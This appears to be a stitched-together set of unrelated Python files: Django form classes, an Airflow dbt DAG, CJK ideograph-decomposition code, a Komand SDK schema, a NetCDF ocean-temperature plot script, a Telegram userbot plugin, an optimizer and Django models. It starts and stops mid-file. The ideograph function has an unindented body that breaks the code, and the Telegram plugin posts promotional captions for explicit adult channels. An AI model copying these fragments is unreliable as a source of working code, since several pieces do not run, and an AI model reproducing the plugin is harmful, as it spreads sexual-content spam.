                              strip=True,
                              required=True,
                              label=_('Email subject'))

    email_column = forms.ChoiceField(
        label=_('Column to use for target email address'),
        required=True
    )

    cc_email = forms.CharField(
        label=_('Comma separated list of CC emails'),
        required=False
    )
    bcc_email = forms.CharField(
        label=_('Comma separated list of BCC emails'),
        required=False
    )

    send_confirmation = forms.BooleanField(
        initial=False,
        required=False,
        label=_('Send you a summary message?')
    )

    track_read = forms.BooleanField(
        initial=False,
        required=False,
        label=_('Track email reading in an extra column?')
    )

    export_wf = forms.BooleanField(
        initial=False,
        required=False,
        label=_('Download a snapshot of the workflow?'),
        help_text=_('A zip file useful to review the emails sent.')
    )

    confirm_emails = forms.BooleanField(
        initial=False,
        required=False,
        label=_('Check/exclude email addresses before sending?')
    )

    def __init__(self, *args, **kargs):
        # Context passed in by the calling view: available column names,
        # the Action object, and the saved operation payload.
        self.column_names = kargs.pop('column_names')
        self.action = kargs.pop('action')
        self.op_payload = kargs.pop('op_payload')

        super(EmailActionForm, self).__init__(*args, **kargs)

        # Set the initial values from the payload
        self.fields['subject'].initial = self.op_payload.get('subject', '')
        email_column = self.op_payload.get('item_column', None)
        self.fields['cc_email'].initial = self.op_payload.get('cc_email', '')
        self.fields['bcc_email'].initial = self.op_payload.get('bcc_email', '')
        self.fields['confirm_emails'].initial = self.op_payload.get(
            'confirm_emails', False)
        self.fields['send_confirmation'].initial = self.op_payload.get(
            'send_confirmation', False)
        self.fields['track_read'].initial = self.op_payload.get('track_read',
                                                                False)
        self.fields['export_wf'].initial = self.op_payload.get('export_wf',
                                                               False)

        if email_column is None:
            # Try to guess if there is an "email" column
            email_column = next((x for x in self.column_names
                                 if 'email' == x.lower()), None)

        # Initial value for the choice field is a (value, label) pair.
        if email_column is None:
            email_column = ('', '---')
        else:
            email_column = (email_column, email_column)

        self.fields['email_column'].initial = email_column
        self.fields['email_column'].choices = \
            [(x, x) for x in self.column_names]

    def clean(self):
        data = super(EmailActionForm, self).clean()

        email_column = self.cleaned_data['email_column']

        # Check if the values in the email column are correct emails
        try:
            column_data = execute_select_on_table(self.action.workflow.id,
                                                  [],
                                                  [],
                                                  column_names=[email_column])
            if not all([validate_email(x[0]) for x in column_data]):
                # column has incorrect email addresses
                self.add_error(
                    'email_column',
                    _('The column with email addresses has incorrect values.')
                )
        except TypeError:
            # Non-string cell values make validate_email blow up; report it
            # as the same form error rather than crashing.
            self.add_error(
                'email_column',
                _('The column with email addresses has incorrect values.')
            )

        # Each non-empty CC/BCC entry must itself be a valid address.
        if not all([validate_email(x)
                    for x in self.cleaned_data['cc_email'].split(',') if x]):
            self.add_error(
                'cc_email',
                _('Field needs a comma-separated list of emails.')
            )

        if not all([validate_email(x)
                    for x in self.cleaned_data['bcc_email'].split(',') if x]):
            self.add_error(
                'bcc_email',
                _('Field needs a comma-separated list of emails.')
            )

        return data

    class Meta:
        widgets = {'subject': forms.TextInput(attrs={'size': 256})}
class ZipActionForm(forms.Form):
    """Form collecting the parameters to build a ZIP of per-user feedback files.

    Initial values come from the operation payload stored by the view; the
    column choices come from the workflow's column names.
    """

    participant_column = forms.ChoiceField(
        label=_('Key column to use for file name prefix (Participant id if '
                'Moodle ZIP)'),
        required=True
    )

    user_fname_column = forms.ChoiceField(
        label=_('Column to use for file name prefix (Full name if Moodle ZIP)'),
        required=False
    )

    file_suffix = forms.CharField(
        max_length=512,
        strip=True,
        required=False,
        label='File name suffix ("feedback.html" if empty)'
    )

    zip_for_moodle = forms.BooleanField(
        initial=False,
        required=False,
        label=_('This ZIP will be uploaded to Moodle as feedback')
    )

    confirm_users = forms.BooleanField(
        initial=False,
        required=False,
        label=_('Check/exclude users before sending?')
    )

    def __init__(self, *args, **kargs):
        # Context passed in by the calling view: available column names,
        # the Action object, and the saved operation payload.
        self.column_names = kargs.pop('column_names')
        self.action = kargs.pop('action')
        self.op_payload = kargs.pop('op_payload')

        super(ZipActionForm, self).__init__(*args, **kargs)

        # Set the initial values from the payload
        user_fname_column = self.op_payload.get('user_fname_column', None)
        participant_column = self.op_payload.get('item_column', None)

        # A previously-selected column drops the '---' placeholder option.
        if user_fname_column:
            self.fields['user_fname_column'].choices = \
                [(x, x) for x in self.column_names]
            self.fields['user_fname_column'].initial = user_fname_column
        else:
            self.fields['user_fname_column'].choices = \
                [('', '---')] + [(x, x) for x in self.column_names]
            self.fields['user_fname_column'].initial = ('', '---')

        if participant_column:
            self.fields['participant_column'].choices = \
                [(x, x) for x in self.column_names]
            self.fields['participant_column'].initial = participant_column
        else:
            self.fields['participant_column'].choices = \
                [('', '---')] + [(x, x) for x in self.column_names]
            self.fields['participant_column'].initial = ('', '---')

        self.fields['confirm_users'].initial = self.op_payload.get(
            'confirm_users', False)

    def clean(self):
        data = super(ZipActionForm, self).clean()

        # Participant column must be unique
        pcolumn = data['participant_column']
        ufname_column = data['user_fname_column']

        # The given column must have unique values
        if not is_column_table_unique(self.action.workflow.pk, pcolumn):
            self.add_error(
                'participant_column',
                _('Column needs to have all unique values (no empty cells)')
            )
            return data

        # If both values are given and they are identical, return with error
        if pcolumn and ufname_column and pcolumn == ufname_column:
            self.add_error(
                None,
                _('The two columns must be different')
            )
            return data

        # If a moodle zip has been requested
        if data.get('zip_for_moodle', False):
            if not pcolumn or not ufname_column:
                self.add_error(
                    None,
                    _('A Moodle ZIP requires two column names')
                )
                return data

            # Participant columns must match the pattern 'Participant [0-9]+'
            pcolumn_data = get_table_data(self.action.workflow.pk,
                                          None,
                                          column_names=[pcolumn])
            if next((x for x in pcolumn_data
                     if not participant_re.search(str(x[0]))),
                    None):
                self.add_error(
                    'participant_column',
                    _('Values in column must have format "Participant [number]"')
                )

        return data
class EmailExcludeForm(forms.Form):
    """Form to select the values of a column to exclude from an email send."""

    # Email fields to exclude
    exclude_values = forms.MultipleChoiceField([],
                                               required=False,
                                               label=_('Values to exclude'))

    def __init__(self, data, *args, **kwargs):
        """Pop the extra kwargs and build the choice list from the table.

        Expects ``action``, ``column_name`` and optionally ``exclude_values``
        (the previously selected values) in kwargs.
        """
        self.action = kwargs.pop('action', None)
        self.column_name = kwargs.pop('column_name', None)
        # Bug fix: the default used to be the *class* ``list`` (kwargs.pop
        # returns whatever object is given as default, so initial became the
        # type object, not an empty selection). Use an empty list instead.
        self.exclude_init = kwargs.pop('exclude_values', [])

        super(EmailExcludeForm, self).__init__(data, *args, **kwargs)

        # The column is requested twice so fetchall() yields (value, value)
        # pairs — the (value, label) shape MultipleChoiceField.choices needs.
        self.fields['exclude_values'].choices = \
            get_table_cursor(self.action.workflow.pk,
                             self.action.get_filter(),
                             [self.column_name, self.column_name]).fetchall()
        self.fields['exclude_values'].initial = self.exclude_init
class JSONActionForm(forms.Form):
    """Form collecting the parameters needed to send a JSON object."""

    # Column with unique key used to exclude objects from the send.
    key_column = forms.ChoiceField(
        label=_('Column to exclude objects to send (empty to skip step)'),
        required=False
    )

    # Token sent along with the JSON request.
    token = forms.CharField(
        initial='',
        label=_('Authentication Token'),
        strip=True,
        required=True,
        help_text=_('Authentication token provided by the external platform.'),
        widget=forms.Textarea(
            attrs={
                'rows': 1,
                'cols': 120,
                'placeholder': _('Authentication token to be sent with the '
                                 'JSON object.')
            }
        )
    )

    def __init__(self, *args, **kargs):
        """Pop ``column_names``/``op_payload`` and prime the fields."""
        self.column_names = kargs.pop('column_names')
        self.op_payload = kargs.pop('op_payload')

        super(JSONActionForm, self).__init__(*args, **kargs)

        # Initial key column: the stored payload value when present,
        # otherwise the empty "---" placeholder.
        stored_key = self.op_payload.get('key_column', None)
        if stored_key is None:
            initial_pair = ('', '---')
        else:
            initial_pair = (stored_key, stored_key)

        key_field = self.fields['key_column']
        key_field.initial = initial_pair
        key_field.choices = (
            [('', '---')] + [(name, name) for name in self.column_names])

        self.fields['token'].initial = self.op_payload.get('token', '')
class ActionImportForm(forms.Form):
    """Form to upload a file containing a previously exported action."""

    # Action name
    name = forms.CharField(
        max_length=512,
        strip=True,
        required=True,
        label='Name')

    # Uploaded file; size and content-type limits come from the preferences.
    file = RestrictedFileField(
        max_upload_size=str(ontask_prefs.MAX_UPLOAD_SIZE),
        content_types=json.loads(str(ontask_prefs.CONTENT_TYPES)),
        allow_empty_file=False,
        label=_('File'),
        help_text=_('File containing a previously exported action'))
|
"""
Sample basic DAG which dbt runs a project
"""
import datetime as dt
from airflow import DAG
from airflow.utils.dates import days_ago
from airflow_dbt_python.dbt.operators import DbtRunOperator
# Hourly DAG with a single task that runs the dbt project.
with DAG(
    dag_id="example_basic_dbt_run",
    schedule_interval="0 * * * *",  # every hour, on the hour
    start_date=days_ago(1),
    catchup=False,  # do not backfill missed runs
    dagrun_timeout=dt.timedelta(minutes=60),
) as dag:
    # Run models tagged "hourly" (plus their upstream parents, per the "+"
    # prefix), excluding deprecated ones, against the "production" target.
    dbt_run = DbtRunOperator(
        task_id="dbt_run_hourly",
        project_dir="/path/to/my/dbt/project/",
        profiles_dir="~/.dbt/",
        models=["+tag:hourly"],
        exclude=["tag:deprecated"],
        target="production",
        profile="my-project",
        full_refresh=False,
    )
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An IDS (Ideographic Description Sequence)."""
from typing import Callable, Optional, Text, List, cast
from src.utils import region as region_lib
LookupCb = Callable[[Text], Optional[Text]]
def _fast_is_cjk(x) -> bool:
"""Given a character ordinal, returns whether or not it is CJK."""
# Clauses, in order:
# (1) CJK Unified Ideographs
# (2) CJK Unified Ideographs Extension A
# (3) CJK Unified Ideographs Extension B
# (4) CJK Unified Ideographs Extension C
# (5) CJK Unified Ideographs Extension D
# (6) CJK Unified Ideographs Extension E
# (7) CJK Unified Ideographs Extension F
# (8) CJK Unified Ideographs Extension G
return (0x4E00 <= x <= 0x9FFF) or (0x3400 <= x <= 0x4DBF) or (
0x20000 <= x <= 0x2A5DF) or (0x2A700 <= x <= 0x2B73F) or (
0x2B740 <= x <= 0x2B81F) or (0x2B820 <= x <= 0x2CEAF) or (
0x2CEB0 <= x <= 0x2EBEF) or (0x30000 <= x <= 0x3134F)
class IdeographicSequence:
  """A character paired with its IDS (Ideographic Description Sequence).

  Stores a decomposition such as 想 => "⿱相心" and can recursively expand
  it in place, e.g. 想 => "⿱相心" => "⿱⿰木目心".

  Attributes:
    character: The character (u'你').
    decomposition: The IDS ("⿰亻尔").
  """

  def __init__(self,
               character: Text,
               decomposition: Optional[Text] = None,
               lookup_cb: Optional[LookupCb] = None):
    """Inits a new Sequence from a known decomposition or a callback.

    Args:
      character: The character.
      decomposition: A known character decomposition.
      lookup_cb: Callback used to decompose |character| when no
        |decomposition| is given.

    Raises:
      ValueError: thrown if the |lookup_cb| fails to decompose |character|,
        or thrown if neither a |decomposition| nor a |lookup_cb| is given.
    """
    self.character = character
    if decomposition is not None:
      self.decomposition = decomposition
      return
    if lookup_cb is None:
      raise ValueError("No provided decomposition or callback.")
    looked_up = lookup_cb(character)
    if looked_up is None:
      raise ValueError(f"No decomposition for {character}.")
    self.decomposition = cast(Text, looked_up)

  def _expand(self, decomposition: Text, lookup_cb: LookupCb):
    """Returns |decomposition| with every decomposable CJK char expanded.

    Args:
      decomposition: An already partially-decomposed representation.
      lookup_cb: A lookup callback which may fail.

    Returns:
      An expanded decomposition, or the same decomposition when no
      expansion is possible.
    """
    pieces = []
    for ch in decomposition:
      if not _fast_is_cjk(ord(ch)):
        # Not an ideograph (e.g. an IDS operator): keep it verbatim.
        pieces.append(ch)
        continue
      looked_up = lookup_cb(ch)
      if looked_up is None or looked_up == ch:
        # No (further) decomposition available: keep the char as-is.
        pieces.append(ch)
      else:
        # The char expanded: recurse into its decomposition first.
        pieces.extend(self._expand(looked_up, lookup_cb))
    return "".join(pieces)

  def recursively_expand(self, lookup_cb: LookupCb):
    """Expands this Sequence's decomposition in-place via |lookup_cb|.

    Args:
      lookup_cb: A lookup callback which may fail.
    """
    self.decomposition = self._expand(self.decomposition, lookup_cb)
class IdeographicSequenceGroup:
  """Holds a character's default decomposition plus regional alternatives.

  Attributes:
    default_sequence: The default Sequence for this IdeographicSequenceGroup.
  """

  def __init__(self, sequence: IdeographicSequence):
    """Instantiates a IdeographicSequenceGroup with a default for all regions.

    Args:
      sequence: A default IdeographicSequence.
    """
    self.default_sequence = sequence
    self._region_to_sequence_map = {}

  def insert(self, regions: List[region_lib.Region],
             alternative: IdeographicSequence):
    """Inserts an alternative sequence at each of a list of regions.

    Args:
      regions: A list of regions.
      alternative: An alternative IDS.

    Raises:
      ValueError: if the alternative sequence doesn't represent the same
        character as the default sequence.
    """
    if alternative.character != self.default_sequence.character:
      raise ValueError("Tried to insert a non-matching alternative IDS.")
    self._region_to_sequence_map.update(
        (region, alternative) for region in regions)

  def character(self):
    """Returns the character this IdeographicSequenceGroup represents."""
    return self.default_sequence.character

  def get_sequence_at_region(
      self, input_region: region_lib.Region) -> IdeographicSequence:
    """Given a region, returns the corresponding sequence.

    Args:
      input_region: The input region.

    Returns:
      The sequence registered for |input_region|, else the default.
    """
    return self._region_to_sequence_map.get(input_region,
                                            self.default_sequence)
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Component:
    """Metadata for the 'get record' action (generated by the Komand SDK)."""

    DESCRIPTION = "Retrieve a record"
class Input:
    """Input parameter names for the 'get record' action."""

    EXTERNAL_ID_FIELD_NAME = "external_id_field_name"
    OBJECT_NAME = "object_name"
    RECORD_ID = "record_id"
class Output:
    """Output field names for the 'get record' action."""

    RECORD = "record"
class GetRecordInput(komand.Input):
    """Input JSON schema for 'get record' (generated by the Komand SDK — do not edit)."""

    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "external_id_field_name": {
      "type": "string",
      "title": "External ID Field Name",
      "description": "The name of the external ID field that should be matched with record_id. If empty, the 'Id' field of the record is used",
      "default": "",
      "order": 2
    },
    "object_name": {
      "type": "string",
      "title": "Object Name",
      "description": "The name of the object (e.g. 'Account')",
      "default": "Account",
      "order": 3
    },
    "record_id": {
      "type": "string",
      "title": "Record ID",
      "description": "The ID of an existing record",
      "order": 1
    }
  },
  "required": [
    "object_name",
    "record_id"
  ]
}
""")

    def __init__(self):
        # Generated pattern: super(self.__class__, ...) is only safe because
        # this class is never subclassed.
        super(self.__class__, self).__init__(self.schema)
class GetRecordOutput(komand.Output):
    """Output JSON schema for 'get record' (generated by the Komand SDK — do not edit)."""

    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "record": {
      "type": "object",
      "title": "Record",
      "description": "Matched record",
      "order": 1
    }
  }
}
""")

    def __init__(self):
        # Generated pattern: super(self.__class__, ...) is only safe because
        # this class is never subclassed.
        super(self.__class__, self).__init__(self.schema)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 26 15:38:12 2016
@author: raissaphilibert
"""
import datetime as dt # Python standard library datetime module
import numpy as np
from netCDF4 import Dataset # http://code.google.com/p/netcdf4-python/
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
from netcdftime import utime
from datetime import datetime
from repel_labels import *
# Path of the MODIS SST NetCDF file to plot.
# NOTE(review): 'file' shadows the Python 2 builtin of the same name; kept
# because the rest of the script reads it (nc_f = file).
file = '/Users/raissaphilibert/Dropbox/oceanography_mac/nitrification/write-upsandpresentations/Paper_Benguela_nitrification/WSAfrica_MODIS_sst_20111129.nc4'
# Bug fix: the attribution block below appeared twice back-to-back (two
# adjacent triple-quoted literals); the verbatim duplicate was removed.
'''
NAME
    NetCDF with Python
PURPOSE
    To demonstrate how to read and write data with NetCDF files using
    a NetCDF file from the NCEP/NCAR Reanalysis.
    Plotting using Matplotlib and Basemap is also shown.
PROGRAMMER(S)
    Chris Slocum
REVISION HISTORY
    20140320 -- Initial version created and posted online
    20140722 -- Added basic error handling to ncdump
                Thanks to K.-Michael Aye for highlighting the issue
REFERENCES
    netcdf4-python -- http://code.google.com/p/netcdf4-python/
    NCEP/NCAR Reanalysis -- Kalnay et al. 1996
        http://dx.doi.org/10.1175/1520-0477(1996)077<0437:TNYRP>2.0.CO;2
'''
def ncdump(nc_fid, verb=True):
    '''
    ncdump outputs dimensions, variables and their attribute information.
    The information is similar to that of NCAR's ncdump utility.
    ncdump requires a valid instance of Dataset.

    Parameters
    ----------
    nc_fid : netCDF4.Dataset
        A netCDF4 dateset object
    verb : Boolean
        whether or not nc_attrs, nc_dims, and nc_vars are printed

    Returns
    -------
    nc_attrs : list
        A Python list of the NetCDF file global attributes
    nc_dims : list
        A Python list of the NetCDF file dimensions
    nc_vars : list
        A Python list of the NetCDF file variables
    '''
    # NOTE(review): Python 2 print statements throughout — this module will
    # not run under Python 3 without conversion.
    def print_ncattr(key):
        """
        Prints the NetCDF file attributes for a given key

        Parameters
        ----------
        key : unicode
            a valid netCDF4.Dataset.variables key
        """
        try:
            print "\t\ttype:", repr(nc_fid.variables[key].dtype)
            for ncattr in nc_fid.variables[key].ncattrs():
                print '\t\t%s:' % ncattr,\
                    repr(nc_fid.variables[key].getncattr(ncattr))
        except KeyError:
            # Dimensions without a matching variable land here.
            print "\t\tWARNING: %s does not contain variable attributes" % key

    # NetCDF global attributes
    nc_attrs = nc_fid.ncattrs()
    if verb:
        print "NetCDF Global Attributes:"
        for nc_attr in nc_attrs:
            print '\t%s:' % nc_attr, repr(nc_fid.getncattr(nc_attr))
    nc_dims = [dim for dim in nc_fid.dimensions]  # list of nc dimensions
    # Dimension shape information.
    if verb:
        print "NetCDF dimension information:"
        for dim in nc_dims:
            print "\tName:", dim
            print "\t\tsize:", len(nc_fid.dimensions[dim])
            print_ncattr(dim)
    # Variable information.
    nc_vars = [var for var in nc_fid.variables]  # list of nc variables
    if verb:
        print "NetCDF variable information:"
        for var in nc_vars:
            if var not in nc_dims:
                print '\tName:', var
                print "\t\tdimensions:", nc_fid.variables[var].dimensions
                print "\t\tsize:", nc_fid.variables[var].size
                print_ncattr(var)
    return nc_attrs, nc_dims, nc_vars
# --- Open the dataset and dump its structure -------------------------------
nc_f = file  # Your filename
nc_fid = Dataset(nc_f, 'r')  # Dataset is the class behavior to open the file
# and create an instance of the ncCDF4 class
nc_attrs, nc_dims, nc_vars = ncdump(nc_fid)
# Extract data from NetCDF file
lats = nc_fid.variables['lat'][:]  # extract/copy the data
lons = nc_fid.variables['lon'][:]
time = nc_fid.variables['time'][:]
time_units= nc_fid.variables['time'].units
sst = nc_fid.variables['sst'][:]  # shape is time, lat, lon as shown above
#lon, lat = np.meshgrid(lons, lats)
## HERER WILL TRY CALCULATE A CLIMATOLOGY
#mean_adt=[]
#for i in adt:
#    time_idx = i
#    adt_cyclic, lons_cyclic = addcyclic(adt[time_idx, :, :], lons)
## Create 2D lat/lon arrays for Basemap
#    lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
## Transforms lat/lon into plotting coordinates for projection
#    x, y = m(lon2d, lat2d)
#    gridded[i]=(lon2d,lat2d,adt_cyclic)
#
#
###gets the unit of time from the netcdf file
cdftime = utime(time_units)
date1 = cdftime.num2date(time)  # turns the times in date (2014,12,6,0,0)
date = [datet.date() for datet in date1]
date2 = [datet.toordinal() for datet in date]
##date I want YYYY,M,DAY
# Locate the time index of 29 Nov 2011 via its ordinal day number.
date_select = ((datetime(2011,11,29)).date()).toordinal()
time_idx =date2.index(date_select)
# Plot of global temperature on our random day
fig = plt.figure()
fig.subplots_adjust(left=0., right=1., bottom=0., top=0.9)
# Setup the map. See http://matplotlib.org/basemap/users/mapsetup.html
# for other projections.
# Make the plot continuous
# Cylindrical projection clipped to the south-west African coast.
m=Basemap(projection='cyl',llcrnrlon=13,llcrnrlat=-36,urcrnrlon=21.,urcrnrlat=-27.,
          #lat_0=-35, lon_0=18,
          resolution='l', area_thresh=1000.0)
m.drawcoastlines()
m.drawmapboundary()
adt_cyclic, lons_cyclic = addcyclic(sst[time_idx, :, :], lons)
# Shift the grid so lons go from -180 to 180 instead of 0 to 360.
#adt_cyclic, lons_cyclic = shiftgrid(180., adt_cyclic, lons_cyclic, start=False)
# Create 2D lat/lon arrays for Basemap
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
# Transforms lat/lon into plotting coordinates for projection
x, y = m(lon2d, lat2d)
# Plot of air temperature with 11 contour intervals
cs = m.contourf(x, y, adt_cyclic, 11, cmap=plt.cm.viridis)
# plot the mean frontal positions
# NOTE(review): 'matplotlib' is not imported directly in this file —
# presumably provided by 'from repel_labels import *'; verify, otherwise
# the next line raises NameError.
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
#m.contour(x,y,adt_cyclic,[-1.244],colors='r',linewidth=1.3)# % Sbdy
#m.contour(x,y,adt_cyclic,[-0.943],colors='r',linewidth=1.3)#% SACCF_N
cbar = plt.colorbar(cs, orientation='horizontal', shrink=0.5)
cbar.set_label("%s (%s)" % (nc_fid.variables['sst'].standard_name,\
                            nc_fid.variables['sst'].units))
cur_time=(datetime.fromordinal((date_select)).date()).strftime('%m/%d/%Y')
m.drawcoastlines()
m.drawcountries()
m.fillcontinents(color='coral')
m.drawmapboundary()
parallels = np.arange(-36,-27,5.)
# labels = [left,right,top,bottom]
m.drawparallels(parallels,labels=[True,False,False,True])
meridians = np.arange(-180,180,5.)
m.drawmeridians(meridians,labels=[True,True,False,True])
plt.title("%s" % (cur_time))
#data_lat (samples lats)
# Mark the sampling station position.
data_lat=[-32]
data_lon=[18]
name =['Station']
x, y = m(data_lon, data_lat)
xy=zip(data_lon,data_lat)
m.scatter(x, y, marker='D',color='m')
#text(data_lon,data_lat,'Station')
fig.savefig('sst_sampple_pos.eps', bbox_inches='tight')
nc_fid.close()
import asyncio
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, StartTime, bot
from userbot.utils import bash, edit_or_reply, zelda_cmd
# Default thumbnail attached to every posted "content" message.
hpx_thumb = "https://telegra.ph/file/6c06e1d0a0183d0f4da06.jpg"
@zelda_cmd(pattern="hpx (.*)")
async def amireallycuan(cuan):
    """Post a formatted "content" message: ``.hpx <link> <caption>``.

    Deletes the trigger message, sends the default thumbnail with the
    formatted caption, and falls back to editing the message with a plain
    text notice when sending the file fails.
    """
    # NOTE(review): the splits assume both a link and a caption are present;
    # `.hpx <link>` alone raises IndexError — TODO confirm intended usage.
    capt = str(cuan.pattern_match.group(1).split(" ", 1)[1])
    link = str(cuan.pattern_match.group(1).split(" ", 2)[0])
    # Cleanup: removed unused locals from the original (user, reply_message,
    # capti, msg) — none of their values were read.
    thumb = hpx_thumb
    output = (
        f"✰ {capt}\n\n"
        f"**LINK NOBAR** 🎞🔞\n"
        f"{link}\n\n"
        f"-----------------------------------\n"
        f"📍**LIHAT LEBIH BANYAK :**\n"
        "@asupanhypersex - @hyperseexx"
    )
    if thumb:
        try:
            logo = thumb
            await cuan.delete()
            await bot.send_file(cuan.chat_id, logo, caption=output)
            await asyncio.sleep(300)
        except BaseException:
            await cuan.edit(
                output + "\n\n ***Tidak Ada Thumbnail!"
                "\nHarap balas ke gambar untuk dijadikan thumbnail Content.**"
            )
    else:
        await edit_or_reply(cuan, output)
CMD_HELP.update(
{
"content_hpx": f"**Plugin : **`Content CH`\
\n\n • **Syntax :** `{cmd}hpx` <Link> <Caption>\
\n • **Function : **Untuk membuat Content Pada Channel.\
"
}
)
|
import numpy as np
from xbbo.search_algorithm.base import AbstractOptimizer
from xbbo.configspace.space import DenseConfiguration, DenseConfigurationSpace
from . import alg_register
# from xbbo.configspace.feature_space import Uniform2Gaussian
from xbbo.search_algorithm.base import AbstractOptimizer
from xbbo.core.trials import Trial, Trials
@alg_register.register('cem')
class CEM(AbstractOptimizer):
    """Cross-Entropy Method optimizer.

    Draws ``llambda`` candidates per generation from a parametric sampler
    (Gaussian or Uniform over the dense space), then refits the sampler on
    the elite (lowest observed value) fraction of the generation.
    """

    def __init__(self,
                 space: DenseConfigurationSpace,
                 seed: int = 42,
                 llambda=30,
                 elite_ratio=0.3,
                 sample_method: str = 'Gaussian',
                 **kwargs):
        """Initialize the optimizer.

        Args:
          space: Search space to optimize over.
          seed: RNG seed.
          llambda: Population size per generation.
          elite_ratio: Fraction of the population kept as elites.
          sample_method: 'Gaussian' or 'Uniform'.

        Raises:
          ValueError: if ``sample_method`` is not a known sampler name.
        """
        AbstractOptimizer.__init__(self,
                                   space,
                                   encoding_cat='bin',
                                   encoding_ord='bin',
                                   seed=seed,
                                   **kwargs)
        self.dimension = self.space.get_dimensions()
        self.bounds = self.space.get_bounds()
        if sample_method == 'Gaussian':
            self.sampler = Gaussian_sampler(self.dimension, self.bounds,
                                            self.rng)
        elif sample_method == 'Uniform':
            self.sampler = Uniform_sampler(self.dimension, self.bounds,
                                           self.rng)
        else:
            # Bug fix: an unknown method used to leave self.sampler unset,
            # failing later with AttributeError; fail fast instead.
            raise ValueError(
                "Unknown sample_method: {!r} (expected 'Gaussian' or "
                "'Uniform')".format(sample_method))
        self.buffer_x = []
        self.buffer_y = []
        self.llambda = llambda  # if llambda else 4 + math.floor(3 * math.log(self.dimension))
        self.elite_ratio = elite_ratio
        # Keep at least two elites so the refitted std / min-max stay usable.
        self.elite_num = max(int(round(self.llambda * self.elite_ratio)), 2)
        self.trials = Trials(space, dim=self.dimension)

    def _suggest(self, n_suggestions=1):
        """Draw ``n_suggestions`` fresh candidate trials from the sampler."""
        trial_list = []
        for n in range(n_suggestions):
            new_individual = self.sampler.sample()
            config = DenseConfiguration.from_array(self.space, new_individual)
            trial_list.append(
                Trial(config,
                      config_dict=config.get_dictionary(),
                      array=new_individual,
                      origin='CEM'))
        return trial_list

    def _get_elite(self):
        """Return the elite (lowest-value) slice of the observation buffer."""
        self.buffer_x = np.asarray(self.buffer_x)
        self.buffer_y = np.asarray(self.buffer_y)
        idx = np.argsort(self.buffer_y)[:self.elite_num]
        return self.buffer_x[idx, :], self.buffer_y[idx]

    def _observe(self, trial_list):
        """Record observed trials; once a full generation (``llambda``
        observations) has accumulated, refit the sampler on the elites and
        clear the buffer."""
        for trial in trial_list:
            self.trials.add_a_trial(trial, permit_duplicate=True)
            self.buffer_x.append(trial.array)
            self.buffer_y.append(trial.observe_value)
        if len(self.buffer_x) < self.llambda:
            return
        elite_x, elite_y = self._get_elite()
        self.sampler.update(elite_x, elite_y)
        self.buffer_x = []
        self.buffer_y = []
class Gaussian_sampler():
    """Diagonal-Gaussian candidate sampler for CEM.

    Starts centred on the bounding box with a 6-sigma spread covering the
    full range, and is refit to the elite population on every update.
    """

    def __init__(self, dim, bounds, rng) -> None:
        self.bounds = bounds
        upper, lower = bounds.ub, bounds.lb
        # Box centre; (upper - lower) / 6 puts the box edges at 3 sigma.
        self.mean = (upper + lower) / 2
        self.std = (upper - lower) / 6
        self.dim = dim
        self.rng = rng

    def update(self, elite_x, elite_y):
        """Refit mean/std to the elite samples (elite_y is unused)."""
        self.mean = np.mean(elite_x, axis=0)
        self.std = np.std(elite_x, axis=0)

    def sample(self, ):
        """Draw one candidate, clipped back into the bounds."""
        # The tiny epsilon keeps the draw valid when std collapses to zero.
        draw = self.rng.normal(self.mean, self.std + 1e-17)
        return np.clip(draw, self.bounds.lb, self.bounds.ub)
class Uniform_sampler():
    """Box-uniform candidate sampler for CEM.

    Starts uniform over the full bounds and shrinks to the axis-aligned
    bounding box of the elite population on every update.
    """

    def __init__(self, dim, bounds, rng) -> None:
        self.bounds = bounds
        # Initial box spans the whole search space.
        self.min = np.copy(bounds.lb)
        self.max = np.copy(bounds.ub)
        self.dim = dim
        self.rng = rng

    def update(self, elite_x, elite_y):
        """Shrink the box to the elites' coordinate-wise extremes
        (elite_y is unused)."""
        self.min = np.amin(elite_x, axis=0)
        self.max = np.amax(elite_x, axis=0)

    def sample(self, ):
        """Draw one candidate uniformly from the current box, clipped to
        the original bounds."""
        draw = self.rng.uniform(self.min, self.max)
        return np.clip(draw, self.bounds.lb, self.bounds.ub)
# Entry-point name expected by the algorithm loader.
opt_class = CEM
import uuid
from django.db import models
class BaseObject(models.Model):
    """Abstract base model with a UUID primary key and audit timestamps."""

    class Meta:
        abstract = True

    # UUID primary key generated in Python at creation time.
    uid = models.UUIDField(primary_key=True, editable=False, default=uuid.uuid4)
    # Set once on INSERT.
    created_at = models.DateTimeField(auto_now_add=True, editable=False)
    # Refreshed on every save().
    modified_at = models.DateTimeField(auto_now=True, editable=False)
class Player(BaseObject):
    """A participant who can appear on game scoreboards."""

    name = models.CharField(max_length=100)

    def __str__(self):
        return self.name
class Game(BaseObject):
    """A game; players are attached through ScoreboardEntry rows."""

    name = models.CharField(max_length=100)
    # related_name="+" disables the reverse accessor from Player.
    players = models.ManyToManyField(Player, related_name="+", through="ScoreboardEntry")

    def __str__(self):
        return self.name
class ScoreboardEntry(BaseObject):
    """Through-model linking a Player to a Game with a score."""

    player = models.ForeignKey(Player, on_delete=models.CASCADE, related_name="scores")
    game = models.ForeignKey(Game, on_delete=models.CASCADE, related_name="scores")
    score = models.PositiveIntegerField()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Bug fix: install_requires is a setuptools feature; plain distutils
# silently ignores it, leaving the Django dependency undeclared. Prefer
# setuptools, keeping distutils as a fallback.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

setup(
    name='django-timecode',
    version='0.1.4',
    description='Provides classes for working with timecodes (as used in the video industry).',
    long_description=open('README.md').read(),
    author='Joe Rickerby',
    author_email='joerick@mac.com',
    url='http://github.com/joerick/django-timecode/',
